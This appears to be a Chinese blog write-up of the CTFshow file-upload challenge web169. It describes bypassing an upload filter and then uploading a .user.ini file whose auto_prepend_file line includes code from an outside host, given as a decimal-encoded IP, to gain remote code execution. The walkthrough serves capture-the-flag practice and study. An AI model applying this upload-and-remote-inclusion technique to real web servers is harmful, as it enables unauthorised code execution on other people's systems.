CTFshow 文件上传 web169

覃榜言

 关注

阅读 84

2022-02-17

目录

思路

查看源代码,要求上传zip

上传zip后抓包,返回错误,把文件类型改成image/png,提示null

清空全部内容,提示上传成功,文件后缀也可以任意改

初步尝试发现< > ?都被过滤了,肯定不能直接写php代码了,不过可以上传php文件,就可以利用.user.ini进行日志文件包含和远程文件包含(条件需要当前目录有可执行的php文件,所以先要上传php,内容无关紧要)

.user.ini

auto_prepend_file=http://2002459365

访问上传的php文件,回显成功直接rce拿到flag

总结

相关推荐

CTFshow 文件上传 web151

辰鑫chenxin 34 0 0

CTFshow 文件上传 web163

七千22 82 0 0

CTFshow 文件上传 web152

星河出山 39 0 0

CTFshow 文件上传 web158

eelq 39 0 0

CTFshow 文件上传 web168

Fifi的天马行空 61 0 0

CTFshow 文件上传 web170

小云晓云 51 0 0

CTFshow 文件上传 web167

jjt二向箔 73 0 0

ctfshow——文件上传

读思意行 21 0 0

CTFshow web(php文件上传155-158)

ZSACH 15 0 0

ctfshow 文件上传161-167

ZSACH 114 0 0

精彩评论(0)

0 0 举报